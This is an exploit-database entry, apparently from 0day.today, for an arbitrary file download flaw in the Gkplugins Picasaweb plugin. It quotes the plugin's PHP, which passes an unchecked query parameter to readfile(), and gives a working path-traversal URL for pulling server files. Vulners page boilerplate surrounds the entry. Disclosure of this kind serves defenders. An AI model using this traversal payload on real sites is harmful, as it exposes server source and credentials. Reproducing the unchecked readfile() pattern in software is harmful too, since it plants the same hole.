Lucene search
K

Gkplugins Picasaweb - Download File Vulnerability

🗓️ 15 Aug 2015 00:00:00Reported by TMT znoType 
zdt
 zdt
🔗 0day.today👁 23 Views

Gkplugins Picasaweb File Download Vulnerability in Windows

Code
# Exploit Title: Gkplugins Picasaweb Download File
# Date : 2015-08-13
# Exploit Author : TMT [VNhgroup]
# Vendor Homepage: https://gkplugins.com/
# Tested on: Windows 7
 
File
------------------------
$fileout = $_GET['f']; <--  can you download file
$filelength = $_GET['l'];
$filestream = $_GET['start'];
if($fileout!=""){
    $fileout = urldecode($fileout);
    $filelength = urldecode($filelength);
    if($filestream!=""){
        $filelength -= $filestream;
        $filestream = "?start=".$filestream;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . $filelength);
    readfile($fileout.$filestream);
}else{
    $text = get_curl($link); 
    echo $text;
}
 
------------------------------
Exploit Code:
site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php

#  0day.today [2018-02-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Aug 2015 00:00Current
7.1High risk
Vulners AI Score7.1
23